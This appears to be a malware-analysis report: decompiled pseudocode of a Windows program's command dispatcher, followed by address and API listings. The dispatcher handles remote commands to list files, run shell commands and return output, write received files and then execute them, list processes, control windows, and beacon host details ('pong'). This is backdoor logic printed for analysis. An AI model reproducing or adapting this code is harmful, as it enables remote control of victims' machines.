                                          																													__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t557,  &_v53, 0x4108d8);
                                          																													__imp__??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z(_t557);
                                          																													_a7 = _t557;
                                          																													__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          																													__eflags = _a7;
                                          																													if(_a7 == 0) {
                                          																														while(1) {
                                          																															__eflags = FindNextFileA(_v84,  &_v720);
                                          																															if(__eflags == 0) {
                                          																																break;
                                          																															}
                                          																															_t565 =  &(_v720.cFileName);
                                          																															__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t565,  &_v53, "..");
                                          																															__imp__??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z(_t565);
                                          																															_a7 = _t565;
                                          																															__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          																															__eflags = _a7;
                                          																															if(_a7 == 0) {
                                          																																continue;
                                          																															}
                                          																															_t567 =  &_v720;
                                          																															__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z(_t567, 0x140,  &_v85);
                                          																															__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t567);
                                          																															L72:
                                          																															__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          																														}
                                          																														_t1130 = _t1129 - 0x10;
                                          																														_t561 =  &_v72;
                                          																														_a4 = _t1130;
                                          																														L0040FC1A();
                                          																														L0040FC14();
                                          																														_t1091 = _t1130 + 0x18;
                                          																														E00402198(0x415a30, _a4);
                                          																														__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t561, _t561, "scrslist", 0x415268,  &_v52);
                                          																														__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          																														goto L15;
                                          																													}
                                          																													_t569 =  &_v720;
                                          																													__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z(_t569, 0x140,  &_a7);
                                          																													__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t569);
                                          																													goto L72;
                                          																												}
                                          																												__eflags =  *0x41576a;
                                          																												if(__eflags != 0) {
                                          																													goto L98;
                                          																												}
                                          																												E00405F6C(0, 0);
                                          																												L26:
                                          																												goto L98;
                                          																											}
                                          																											E0040520C(_t363, 0x4156c0);
                                          																											goto L98;
                                          																										}
                                          																										 *0x415a70 = 1;
                                          																										__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(E00401289( &_v20, __eflags, 1));
                                          																										_push(1);
                                          																										E00403D9A(0x4156c0);
                                          																										goto L97;
                                          																									}
                                          																									__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(E00401289( &_v20, __eflags, 1));
                                          																									_push(0);
                                          																									E00403D9A(0x4156c0);
                                          																									goto L98;
                                          																								}
                                          																								E00404336(0x4156c0);
                                          																								goto L98;
                                          																							}
                                          																							E0040425F(0x4156c0);
                                          																							goto L98;
                                          																						}
                                          																						_v48 = _v48 & 0x00000000;
                                          																						asm("stosd");
                                          																						asm("stosd");
                                          																						GetKeyboardLayoutNameA( &_v48);
                                          																						_t1132 = _t1091 - 0x10;
                                          																						_push( &_v48);
                                          																						_push(0x415268);
                                          																						_push( &_v36);
                                          																						_t583 =  &_v72;
                                          																						_push(_t583);
                                          																						L0040FC14();
                                          																						_push(_t583);
                                          																						L0040FC20();
                                          																						_t1091 = _t1091 - 0x10 + 0x18;
                                          																						E00402198(0x415a30, _t1132);
                                          																						L22:
                                          																						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          																						goto L23;
                                          																					}
                                          																					_t879 = 0x415ac0;
                                          																					goto L53;
                                          																				}
                                          																				_push(1);
                                          																				L50:
                                          																				_t585 = E00401289( &_v20, __eflags);
                                          																				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          																				E0040DA55(_t1044, atoi(_t585));
                                          																				goto L26;
                                          																			}
                                          																			__eflags =  *0x415ac0;
                                          																			if(__eflags != 0) {
                                          																				E004021C7(_t347, 0x415ac0);
                                          																			}
                                          																			__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(E00401289( &_v20, __eflags, 1));
                                          																			_push(2);
                                          																			goto L50;
                                          																		}
                                          																		_t590 = E00401289( &_v20, __eflags, 1);
                                          																		__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          																		ShellExecuteA(0, "open", _t590, 0, 0, 1);
                                          																		goto L98;
                                          																	}
                                          																	_t592 = E00401289( &_v20, __eflags, 1);
                                          																	_t1134 = _t1091 - 0x10;
                                          																	__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                          																	E0040E8B9(_t1134, __eflags,  &_v52, _t592);
                                          																	_t596 =  &_v72;
                                          																	_a4 = _t1134;
                                          																	L0040FC1A();
                                          																	L0040FC14();
                                          																	_t1091 = _t1134 + 0x18;
                                          																	E00402198(0x415a30, _a4);
                                          																	__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t596, _t596, "cmdoutput", 0x415268,  &_v52);
                                          																	goto L15;
                                          																}
                                          																_t599 = E00401289( &_v20, __eflags, 1);
                                          																__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          																WinExec(_t599, 5);
                                          																goto L98;
                                          															}
                                          															_t602 = E00401289( &_v20, __eflags, 1);
                                          															__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          															GetWindowThreadProcessId(atoi(_t602),  &_a4);
                                          															E0040ECDD(_a4);
                                          															goto L28;
                                          														}
                                          														_push(9);
                                          														L33:
                                          														_t607 = E00401289( &_v20, __eflags, 1);
                                          														__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          														ShowWindow(atoi(_t607), ??);
                                          														goto L98;
                                          													}
                                          													_push(3);
                                          													goto L33;
                                          												}
                                          												_t610 = E00401289( &_v20, __eflags, 1);
                                          												__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          												CloseWindow(atoi(_t610));
                                          												goto L98;
                                          											}
                                          											L28:
                                          											E0040C9DD();
                                          											goto L98;
                                          										}
                                          										_t613 = E00401289( &_v20, __eflags, 1);
                                          										__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          										E0040ECDD(atoi(_t613));
                                          										goto L26;
                                          									}
                                          									__imp___itoa(GetCurrentProcessId(),  &_a4, 0xa);
                                          									_t621 =  &_v136;
                                          									L0040FC1A();
                                          									_t622 =  &_v104;
                                          									L0040FC14();
                                          									_t623 =  &_v72;
                                          									L0040FC14();
                                          									L0040FC20();
                                          									_t1091 = _t1091 + 0x30;
                                          									E00402198(0x415a30, _t1091);
                                          									__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t623, _t623, _t622, _t622, _t621, _t621, "proclist", 0x415268, E004081B7(__eflags,  &_v152), 0x415268,  &_a4, _t687);
                                          									__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          									__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          									goto L22;
                                          								}
                                          								_t625 = E00401289( &_v20, __eflags, 1);
                                          								__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          								_t627 = E0040712F();
                                          								_t1091 = _t1091 + 0xc;
                                          								__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(0x32, 1,  &_v52, 0x30, _t625);
                                          								__imp__??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z(_t627);
                                          								__imp__?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QBE_NXZ();
                                          								__eflags = _t627;
                                          								if(__eflags != 0) {
                                          									_t628 = E00401289( &_v20, __eflags, 2);
                                          									__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                          									_t629 = E00401289( &_v20, __eflags, 2);
                                          									__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t628);
                                          									__imp__?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z(_t629);
                                          									__imp__?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ();
                                          									__eflags = 0;
                                          									__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          									ShellExecuteA(0, "open", _t629, 0, 0, 1);
                                          								}
                                          								__imp__??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ();
                                          								goto L15;
                                          							}
                                          							_t631 = E00401289( &_v20, __eflags, 2);
                                          							__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          							_t633 = E0040712F();
                                          							_t1091 = _t1091 + 0xc;
                                          							__eflags = 0;
                                          							__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(0, 0,  &_v52, 0x30, _t631);
                                          							_t634 = E00401289( &_v20, 0, 1);
                                          							__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t633);
                                          							L0040FF56();
                                          							__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(0, _t634);
                                          							ShellExecuteA(0, "open", _t634, 0, 0, 1);
                                          							goto L15;
                                          						}
                                          						_t636 = E00401289( &_v20, __eflags, 1);
                                          						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                          						E0040BEA2(_t1044, __eflags, _t636);
                                          						_t1091 = _t1091 - 0x10 + 0x10;
                                          						goto L98;
                                          					}
                                          					_push(0);
                                          					_t1020 = 0x415a30;
                                          					L8:
                                          					E00402791(_t1020);
                                          					goto L98;
                                          				}
                                          				_t641 = E0040ED35();
                                          				_t650 =  &_v224;
                                          				L0040FC1A();
                                          				_t651 =  &_v208;
                                          				L0040FC14();
                                          				_t652 =  &_v192;
                                          				L0040FC14();
                                          				_t653 =  &_v168;
                                          				L0040FC14();
                                          				_t654 =  &_v256;
                                          				L0040FC14();
                                          				_t655 =  &_v52;
                                          				L0040FC14();
                                          				_t656 =  &_v120;
                                          				L0040FC14();
                                          				L0040FC14();
                                          				_t1091 = _t1091 + 0x6c;
                                          				E00402198(0x415a30, _t1091);
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t656, _t656, _t655, _t655, _t654, _t654, _t653, _t653, _t652, _t652, _t651, _t651, _t650, _t650, "pong", 0x415268, E00401289( &_v20, _t1150, 1), 0x415268, E0040EDD3( &_v152, E0040E85D( &_v136)), 0x415268, E0040ED35(),  &_v104, E0040E898(_t677), 0x415268, _t641, _t677, _t677,  &_v72, GetTickCount());
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				_t658 = E00401289( &_v20, _t1150, 2);
                                          				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          				_t659 = atoi(_t658);
                                          				if(_t659 <= 0) {
                                          					__eflags =  *_t666(E00401289( &_v20, __eflags, 1), "0");
                                          					if(__eflags == 0) {
                                          						goto L98;
                                          					}
                                          					_push(0);
                                          					_t1020 = 0x415a30;
                                          					goto L8;
                                          				}
                                          				_a4 = _t659 + _t659;
                                          				_t663 = E004022E6(0x415a30);
                                          				_push(_a4);
                                          				if(_t663 == 0) {
                                          					E00402646(0x415a30);
                                          				} else {
                                          					E004026F2(0x415a30);
                                          				}
                                          				goto L98;
                                          			}
                                          0x0040b9bd
                                          0x0040b9bd
                                          0x0040b9bf
                                          0x0040b9c0
                                          0x0040b9c2
                                          0x0040b9c2
                                          0x00000000
                                          0x0040b9c2
                                          0x0040b9a0
                                          0x0040b9a2
                                          0x0040b9a3
                                          0x00000000
                                          0x0040b9a3
                                          0x0040b983
                                          0x0040b985
                                          0x0040b986
                                          0x00000000
                                          0x0040b986
                                          0x0040b902
                                          0x0040b909
                                          0x0040b910
                                          0x0040b919
                                          0x0040b920
                                          0x0040b927
                                          0x0040b930
                                          0x0040b937
                                          0x0040b942
                                          0x00000000
                                          0x0040b947
                                          0x0040b8cf
                                          0x0040b8d6
                                          0x0040b8e0
                                          0x00000000
                                          0x0040b8e0
                                          0x0040b86f
                                          0x0040b876
                                          0x0040b87d
                                          0x0040b88b
                                          0x0040b892
                                          0x0040b89e
                                          0x0040b8a5
                                          0x0040b8ae
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040b75d
                                          0x0040b75d
                                          0x0040b75d
                                          0x0040b764
                                          0x00000000
                                          0x00000000
                                          0x0040b768
                                          0x0040b768
                                          0x0040b789
                                          0x0040b794
                                          0x0040b79b
                                          0x0040b79f
                                          0x0040b7a8
                                          0x0040b7ac
                                          0x0040b7b7
                                          0x0040b7c0
                                          0x0040b7cd
                                          0x0040b7da
                                          0x0040b7e6
                                          0x0040b7ec
                                          0x0040b7ee
                                          0x0040b7f5
                                          0x0040b7fc
                                          0x0040b808
                                          0x0040b80f
                                          0x0040b81c
                                          0x0040b828
                                          0x0040b837
                                          0x0040b83d
                                          0x0040b842
                                          0x0040b84b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040b68f
                                          0x0040b68f
                                          0x0040b68f
                                          0x0040b696
                                          0x00000000
                                          0x00000000
                                          0x0040b69a
                                          0x0040b69a
                                          0x0040b6bb
                                          0x0040b6c6
                                          0x0040b6cd
                                          0x0040b6d1
                                          0x0040b6da
                                          0x0040b6de
                                          0x0040b6e9
                                          0x0040b6f2
                                          0x0040b6ff
                                          0x0040b70b
                                          0x0040b712
                                          0x0040b718
                                          0x0040b719
                                          0x0040b71a
                                          0x0040b71f
                                          0x0040b721
                                          0x0040b72c
                                          0x0040b732
                                          0x0040b737
                                          0x00000000
                                          0x0040b65d
                                          0x0040b65d
                                          0x0040b65d
                                          0x0040b664
                                          0x00000000
                                          0x00000000
                                          0x0040b668
                                          0x0040b668
                                          0x0040b670
                                          0x0040bc75
                                          0x0040bc78
                                          0x00000000
                                          0x0040bc78
                                          0x0040b65b
                                          0x0040b61a
                                          0x0040b621
                                          0x0040b628
                                          0x00000000
                                          0x0040b628
                                          0x0040b585
                                          0x0040b597
                                          0x0040b5ad
                                          0x0040b5c3
                                          0x0040b5d9
                                          0x0040b5ef
                                          0x0040b5f5
                                          0x0040b5fa
                                          0x0040b5fd
                                          0x0040b5fd
                                          0x0040b5fd
                                          0x00000000
                                          0x0040b5fd
                                          0x0040b54d
                                          0x0040b554
                                          0x0040b560
                                          0x00000000
                                          0x0040b560
                                          0x0040b4dd
                                          0x0040b4e9
                                          0x0040b4f0
                                          0x0040b4f7
                                          0x0040b500
                                          0x0040b507
                                          0x0040b50e
                                          0x0040b517
                                          0x0040b51e
                                          0x0040b529
                                          0x0040b52e
                                          0x00000000
                                          0x0040b52e
                                          0x0040b4bc
                                          0x0040b4c2
                                          0x0040ae42
                                          0x0040ae42
                                          0x00000000
                                          0x0040ae42
                                          0x0040b3e3
                                          0x0040b3ee
                                          0x0040b3f9
                                          0x0040b3fe
                                          0x0040b40d
                                          0x0040b40e
                                          0x0040b40f
                                          0x0040b410
                                          0x0040b411
                                          0x0040b416
                                          0x0040b41d
                                          0x0040b45b
                                          0x0040b460
                                          0x0040b465
                                          0x0040b46a
                                          0x0040b46f
                                          0x0040b470
                                          0x0040b478
                                          0x0040b47a
                                          0x0040b47f
                                          0x0040b487
                                          0x0040b41f
                                          0x0040b422
                                          0x0040b427
                                          0x0040b42c
                                          0x0040b431
                                          0x0040b436
                                          0x0040b437
                                          0x0040b43f
                                          0x0040b441
                                          0x0040b446
                                          0x0040b44e
                                          0x0040b453
                                          0x0040b48f
                                          0x0040b4a1
                                          0x0040abc7
                                          0x00000000
                                          0x0040abc7
                                          0x0040b141
                                          0x0040b14a
                                          0x0040b153
                                          0x0040b157
                                          0x0040b15c
                                          0x0040b162
                                          0x0040b16f
                                          0x0040b17c
                                          0x0040b188
                                          0x0040b18e
                                          0x0040b190
                                          0x0040b19d
                                          0x0040b1a3
                                          0x0040b1ad
                                          0x0040b1b7
                                          0x0040b1be
                                          0x0040b1be
                                          0x0040b1c6
                                          0x0040b1cc
                                          0x0040b1d2
                                          0x0040b1de
                                          0x0040b1f7
                                          0x0040b203
                                          0x0040b210
                                          0x0040b217
                                          0x0040b21d
                                          0x0040b220
                                          0x0040b279
                                          0x0040b283
                                          0x0040b28d
                                          0x0040b222
                                          0x0040b229
                                          0x0040b232
                                          0x0040b23f
                                          0x0040b264
                                          0x0040b26a
                                          0x0040b296
                                          0x0040b29d
                                          0x0040b2ad
                                          0x0040b2d8
                                          0x0040b2e4
                                          0x0040b2ed
                                          0x0040b2f4
                                          0x0040b2fd
                                          0x0040b304
                                          0x0040b30d
                                          0x0040b314
                                          0x0040b31d
                                          0x0040b324
                                          0x0040b331
                                          0x0040b33e
                                          0x0040b348
                                          0x0040b350
                                          0x0040b355
                                          0x0040b35b
                                          0x0040b364
                                          0x0040b370
                                          0x0040b37c
                                          0x0040b388
                                          0x0040b394
                                          0x0040b3a0
                                          0x0040b3a9
                                          0x0040b3af
                                          0x0040b3bb
                                          0x0040aa43
                                          0x0040aa43
                                          0x00000000
                                          0x0040aa43
                                          0x0040afce
                                          0x0040afd3
                                          0x0040afe0
                                          0x0040afed
                                          0x0040aff7
                                          0x0040b006
                                          0x0040b010
                                          0x0040b017
                                          0x0040b01e
                                          0x0040b025
                                          0x0040b02b
                                          0x0040b02f
                                          0x0040b05d
                                          0x0040b06d
                                          0x0040b06f
                                          0x00000000
                                          0x00000000
                                          0x0040b07a
                                          0x0040b084
                                          0x0040b08b
                                          0x0040b092
                                          0x0040b099
                                          0x0040b09f
                                          0x0040b0a3
                                          0x00000000
                                          0x00000000
                                          0x0040b0ac
                                          0x0040b0b8
                                          0x0040b0c2
                                          0x0040b057
                                          0x0040b057
                                          0x0040b057
                                          0x0040b0cd
                                          0x0040b0d7
                                          0x0040b0e0
                                          0x0040b0e3
                                          0x0040b0f0
                                          0x0040b0f5
                                          0x0040b0fd
                                          0x0040b105
                                          0x0040b10e
                                          0x00000000
                                          0x0040b114
                                          0x0040b038
                                          0x0040b044
                                          0x0040b04e
                                          0x00000000
                                          0x0040b054
                                          0x0040af90
                                          0x0040af97
                                          0x00000000
                                          0x00000000
                                          0x0040afa1
                                          0x0040abfe
                                          0x00000000
                                          0x0040abff
                                          0x0040af75
                                          0x00000000
                                          0x0040af75
                                          0x0040af36
                                          0x0040af48
                                          0x0040af4e
                                          0x0040af55
                                          0x00000000
                                          0x0040af55
                                          0x0040af09
                                          0x0040af0f
                                          0x0040af16
                                          0x00000000
                                          0x0040af16
                                          0x0040aede
                                          0x00000000
                                          0x0040aede
                                          0x0040aebe
                                          0x00000000
                                          0x0040aebe
                                          0x0040ae5d
                                          0x0040ae66
                                          0x0040ae67
                                          0x0040ae6c
                                          0x0040ae72
                                          0x0040ae7a
                                          0x0040ae7e
                                          0x0040ae7f
                                          0x0040ae80
                                          0x0040ae83
                                          0x0040ae84
                                          0x0040ae8c
                                          0x0040ae8e
                                          0x0040ae93
                                          0x0040ae9b
                                          0x0040abc1
                                          0x0040abc1
                                          0x00000000
                                          0x0040abc1
                                          0x0040ae3d
                                          0x00000000
                                          0x0040ae3d
                                          0x0040ae0c
                                          0x0040ae0e
                                          0x0040ae11
                                          0x0040ae18
                                          0x0040ae22
                                          0x00000000
                                          0x0040ae22
                                          0x0040adce
                                          0x0040add5
                                          0x0040addc
                                          0x0040addc
                                          0x0040adf1
                                          0x0040adf7
                                          0x00000000
                                          0x0040adf7
                                          0x0040ad9e
                                          0x0040ada5
                                          0x0040adb2
                                          0x00000000
                                          0x0040adb2
                                          0x0040ad24
                                          0x0040ad29
                                          0x0040ad2f
                                          0x0040ad39
                                          0x0040ad46
                                          0x0040ad4f
                                          0x0040ad52
                                          0x0040ad5f
                                          0x0040ad64
                                          0x0040ad6c
                                          0x0040ad74
                                          0x00000000
                                          0x0040ad7a
                                          0x0040acf5
                                          0x0040acfc
                                          0x0040ad03
                                          0x00000000
                                          0x0040ad03
                                          0x0040acb7
                                          0x0040acbe
                                          0x0040acc9
                                          0x0040acd2
                                          0x00000000
                                          0x0040acd7
                                          0x0040ac99
                                          0x0040ac66
                                          0x0040ac6b
                                          0x0040ac72
                                          0x0040ac7d
                                          0x00000000
                                          0x0040ac7d
                                          0x0040ac64
                                          0x00000000
                                          0x0040ac64
                                          0x0040ac36
                                          0x0040ac3d
                                          0x0040ac48
                                          0x00000000
                                          0x0040ac48
                                          0x0040ac16
                                          0x0040ac16
                                          0x00000000
                                          0x0040ac16
                                          0x0040abe8
                                          0x0040abef
                                          0x0040abf9
                                          0x00000000
                                          0x0040abf9
                                          0x0040ab3e
                                          0x0040ab5b
                                          0x0040ab67
                                          0x0040ab70
                                          0x0040ab74
                                          0x0040ab7d
                                          0x0040ab81
                                          0x0040ab8b
                                          0x0040ab90
                                          0x0040ab98
                                          0x0040aba0
                                          0x0040aba9
                                          0x0040abb5
                                          0x00000000
                                          0x0040abbb
                                          0x0040aa68
                                          0x0040aa6f
                                          0x0040aa7c
                                          0x0040aa81
                                          0x0040aa8b
                                          0x0040aa98
                                          0x0040aaa4
                                          0x0040aaaa
                                          0x0040aaac
                                          0x0040aab3
                                          0x0040aaba
                                          0x0040aac6
                                          0x0040aacd
                                          0x0040aada
                                          0x0040aae6
                                          0x0040aaec
                                          0x0040aaf5
                                          0x0040ab02
                                          0x0040ab02
                                          0x0040ab0e
                                          0x00000000
                                          0x0040ab14
                                          0x0040a9e3
                                          0x0040a9ea
                                          0x0040a9f7
                                          0x0040a9fc
                                          0x0040a9ff
                                          0x0040aa06
                                          0x0040aa12
                                          0x0040aa19
                                          0x0040aa21
                                          0x0040aa2d
                                          0x0040aa3a
                                          0x00000000
                                          0x0040aa40
                                          0x0040a9af
                                          0x0040a9ba
                                          0x0040a9c0
                                          0x0040a9c5
                                          0x00000000
                                          0x0040a9c5
                                          0x0040a990
                                          0x0040a992
                                          0x0040a975
                                          0x0040a975
                                          0x00000000
                                          0x0040a975
                                          0x0040a7c8
                                          0x0040a810
                                          0x0040a81c
                                          0x0040a825
                                          0x0040a82c
                                          0x0040a835
                                          0x0040a83c
                                          0x0040a845
                                          0x0040a84c
                                          0x0040a855
                                          0x0040a85c
                                          0x0040a865
                                          0x0040a869
                                          0x0040a872
                                          0x0040a876
                                          0x0040a880
                                          0x0040a88a
                                          0x0040a88f
                                          0x0040a897
                                          0x0040a8a0
                                          0x0040a8ac
                                          0x0040a8b8
                                          0x0040a8c4
                                          0x0040a8d0
                                          0x0040a8dc
                                          0x0040a8e8
                                          0x0040a8f4
                                          0x0040a8fd
                                          0x0040a906
                                          0x0040a911
                                          0x0040a918
                                          0x0040a925
                                          0x0040a92a
                                          0x0040a968
                                          0x0040a96b
                                          0x00000000
                                          0x00000000
                                          0x0040a971
                                          0x0040a973
                                          0x00000000
                                          0x0040a973
                                          0x0040a930
                                          0x0040a933
                                          0x0040a938
                                          0x0040a93f
                                          0x0040a94b
                                          0x0040a941
                                          0x0040a941
                                          0x0040a941
                                          0x00000000

                                          APIs
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040A737  (demangled: std::basic_string<char>::basic_string(const basic_string&), copy constructor)
                                          • SetEvent.KERNEL32(?), ref: 0040A740
                                          • CloseHandle.KERNEL32(?), ref: 0040A749
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00415268), ref: 0040A75A  (demangled: std::basic_string<char>::basic_string(const basic_string&), copy constructor)
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040A766  (demangled: std::basic_string<char>::basic_string(const basic_string&), copy constructor)
                                            • Part of subcall function 0040EFB5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040EFC4  (demangled: std::basic_string<char>::basic_string(const std::allocator<char>&))
                                            • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040EFDB  (demangled: unsigned int std::basic_string<char>::length() const)
                                            • Part of subcall function 0040EFB5: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491), ref: 0040EFF1  (demangled: unsigned int std::basic_string<char>::find(const basic_string&, unsigned int) const)
                                            • Part of subcall function 0040EFB5: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 0040F00F  (demangled: std::basic_string<char> std::basic_string<char>::substr(unsigned int, unsigned int) const)
                                            • Part of subcall function 0040EFB5: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F019  (demangled: std::basic_string<char>& std::basic_string<char>::operator=(const basic_string&))
                                            • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F022  (demangled: std::basic_string<char>::~basic_string())
                                            • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F037  (demangled: unsigned int std::basic_string<char>::length() const)
                                            • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F044  (demangled: unsigned int std::basic_string<char>::length() const)
                                            • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F096  (demangled: std::basic_string<char>::~basic_string())
                                            • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F09F  (demangled: std::basic_string<char>::~basic_string())
                                            • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F0A8  (demangled: std::basic_string<char>::~basic_string())
